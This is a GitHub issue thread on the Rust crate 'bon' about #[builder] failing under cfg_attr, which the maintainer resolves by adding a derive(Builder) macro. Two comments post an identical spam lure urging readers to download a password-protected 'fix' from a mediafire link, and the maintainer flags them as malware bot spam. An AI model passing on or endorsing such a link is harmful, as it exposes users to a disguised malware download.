### ISSUE TITLE
Does not work with cfg_attr

### ISSUE THREAD

**Issue by novacrazy** [elastio/bon#68]
Using version 2.0.0

```rust
#[cfg_attr(feature = "bon", bon::builder)]
struct Test {
    #[cfg_attr(feature = "bon", builder(into))]
    field: Option<String>,
}
```
results in:
```
error: cannot find attribute `builder` in this scope 
   --> src/main.rs:386:33
    |
386 |     #[cfg_attr(feature = "bon", builder(into))]
    |                                 ^^^^^^^        
    |
help: consider importing this attribute macro
    |
382 + use bon::builder;
```
doing that results in this error:
```
error: expected non-macro attribute, found attribute macro `builder`
   --> src/main.rs:388:33
    |
388 |     #[cfg_attr(feature = "bon", builder(into))]
    |                                 ^^^^^^^ not a non-macro attribute
```

ignore the line numbers, it's just from a large test file.

Perhaps a `#[derive(bon::Builder)]` would work better for structs.

### A note for the community from the maintainers

Please vote on this issue by adding a 👍 [reaction](https://blog.github.com/2016-03-10-add-reactions-to-pull-requests-issues-and-comments/) to help the maintainers with prioritizing it. You may add a comment describing your real use case related to this issue for us to better understand the problem domain.

**Comment by Veetaha** [comment]
Hi, thank you for creating the issue! Unfortunately, conditional compilation of members is currently not possible with `bon` as described in [the limitations](https://elastio.github.io/bon/guide/limitations#conditional-compilation) due to the lack of [rust-lang/rust/#115590](https://github.com/rust-lang/rust/issues/115590).

This is because the `finish_fn` (i.e. `build()` or `call()`) needs to have a conditional `where` bound for the members where it allows you to transition to the terminal builder state only when all members are set.

**Comment by ahmar7** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by NikhilKumar77777** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Veetaha** [comment]
Ah, looks like the `bug` label attracts malware bot spammers 🫤

**Comment by Veetaha** [comment]
I've checked the docs a bit, and I'm almost sure a `derive()` is what's going to fix this for `struct` syntax. I can use it then to fix this for structs, but I still need to find a way to fix it for function syntax.

**Comment by novacrazy** [comment]
Having the `#[bon::builder]` macro simply apply a new `#[derive(bon::Builder)]` (note the capitalization) seems like a reasonable backwards-compatible change. For this kind of functionality it's very common in the Rust ecosystem to use a derive-trait/pseudo-trait instead of an attribute macro anyway, so `#[derive(bon::Builder)]` feels more natural. 

For functions the regular attribute macro makes more sense.

**Comment by Veetaha** [comment]
Yep, `derive()`'s more common, but I wanted to have a reusable single macro for both functions and structs. There is basically a single macro attribute parsing impl internally between structs and fns in `bon` thanks to this right now. Also, it's a bit more convenient to write
```rust
#[builder(some_config_attrs_here)]
struct Foo { }
```
rather than
```rust
#[derive(bon::Builder)]
#[builder(some_config_attrs_here)]
struct Foo { }
```

Also, regular proc-macro-attributes are a bit more powerful, since they allow mutating the struct/enum they are placed on. `bon` doesn't do that right now, but this potential is nice to have. Therefore, I landed on a single `#[builder]` API

**Comment by Veetaha** [comment]
Note that for the code mentioned in the issue description, you could use the following workaround, while this problem exists in `bon`.  If you need to configure only `into` at members level, you can configure it for all fields of type `String` at once this way using only the macro only at the top-level like this, which should avoid the compile error:

```rust
#[cfg_attr(feature = "bon", builder(on(String, into)))]
struct Test {
    field: Option<String>,
}
```

The type pattern specified in `on()` matches the inner type of `Option<T>` fields. It's worded in [the docs](https://elastio.github.io/bon/reference/builder#on) as:
> For optional members the underlying type is matched ignoring the `Option` wrapper.

**Comment by Veetaha** [comment]
I found [this post](https://users.rust-lang.org/t/supporting-or-evaluating-cfg-in-proc-macro-parameters/93240/2?u=veetaha) from @recatek on Rust forum, that suggests a particular pattern of "macro induction chain" to resolve the CFG attributes. The solution looks rather obvious to me. However, here is a question to @recatek (🙏), I wonder if it was implemented in some public repository, that could be used as a reference to speed up this implementation in `bon`.

In general, though, I think it could even be a separate crate e.g. `expand-cfg` to assist in expanding the `cfg/cfg_attr` attributes for proc macros. Although, I'm not sure I want to extract this into a separate crate at least initially.

**Comment by recatek** [comment]
Hello! Yes, a generalized crate for this technique would be neat. It certainly isn't the cleanest thing in the world, and probably isn't great for compile times, but it does work and does give your proc macro an awareness of what cfg flags are available in your invoking environment.

**Comment by Veetaha** [comment]
Great! Thank you for sharing it! :heart:

**Comment by Veetaha** [comment]
Some updates on this issue. I started working on this in https://github.com/elastio/bon/pull/99. I improved the approach by using a single macro (not defining new `macro_rules!` in the expansion) that just internally uses recursion. The PR is still WIP and doesn't compile yet, but I'm positive it'll be merged this week

**Comment by Veetaha** [comment]
So.. I've basically reinvented the cfg/cfg_attr myself. And it works, but.. the IDE experience it's the best. The syntax highlighting doesn't make it clear that the code is disabled. I also figured out that Rust Rover in particular sucks at support for proc macro attributes (#104), and it caused people to stop using bon 

Therefore I'm considering adding the derive variant of the API for structs specifically. Most IDEs support derive macros much better, and it's anyway a more usual pattern of usage for developers. 

I'm thinking that as the next step I'll add a Builder derive macro, then change the `#[builder]` macro to expand to it internally. I'll also expose the derive API as public and mark `#[builder]` usages as deprecated on structs (pending the next major release to stop supporting this).


I also wonder what @EdJoPaTo thinks about this? I think you also said you'd prefer a derive variant

**Comment by Veetaha** [comment]
I've implemented a `#[derive(bon::Builder)]` version in my PR: https://github.com/elastio/bon/pull/99, which was an embarrasingly small amount of work to do. 

I even added a CLI that assists in migration, it uses rust-analyzer API to parse all rust files it can find and replace `#[builder]` with a `#[derive(Builder)]` in your code.

If in case you want to test it from my branch, here is how you can do this:

Add this WIP version of `bon` into your Cargo.toml
```toml
bon = { git = "https://github.com/elastio/bon", branch = "feat/support-cfg-attrs" }
```

Install and run the migration script:
```bash
cargo install --git https://github.com/elastio/bon --branch feat/support-cfg-attrs  bon-cli && bon migrate
```

**Comment by EdJoPaTo** [comment]
> I also wonder what @EdJoPaTo thinks about this? I think you also said you'd prefer a derive variant.

Especially when using `#[builder(into)` on the elements on the struct directly the `derive` is way more similar to known, big crates like for example serde. So I would prefer it even when the `cfg_attr` stuff isn't needed.

---

Personally I wouldnt start using a cli to migrate. Guess `frankenstein` is quite a big example, but for other projects it would be just a few lines to change so quite easy to do manually.
The bigger question this change raises for me: Is the deprecation worth it? Is a breaking release just simpler and getting rid of workarounds in the code to keep the old logic working?

**Comment by Veetaha** [comment]
This issue has been closed by https://github.com/elastio/bon/pull/99. There I've introduced a new `derive(bon::Builder)` syntax that supports cfg/cfg_attr natively. Also, if you want to do conditional compilation with impl/fn syntax with `#[builder]` that is also supported. There are some long-to-explain macro hacks with macros that make it work for the `#[builder]` proc-macro attribute.

Note that I decided not to emit a deprecation warning for the usages of `#[builder]` macro on top of the structs just yet. I'm planning to give who'll read my Reddit post some time to upgrade without any disruption and then I'll enable the deprecation later (in a subsequent minor release `2.3` in a week or two).

Right now the change is in master, and it's pending the `2.2` release of `bon`. I'll do that release tomorrow in the afternoon together with the blog post on Reddit which describes this change in detail.

Btw. I also created a [Discord server for bon](https://discord.gg/QcBYSamw4c) where you can leave any other feedback or questions you might have. Feel free to join!

**Comment by Veetaha** [comment]
This feature is now available in `bon` 2.2. Here is the [release blog post on Reddit](https://www.reddit.com/r/rust/comments/1fc0ai7/media_nextgen_builder_macro_bon_22_release_derive/)
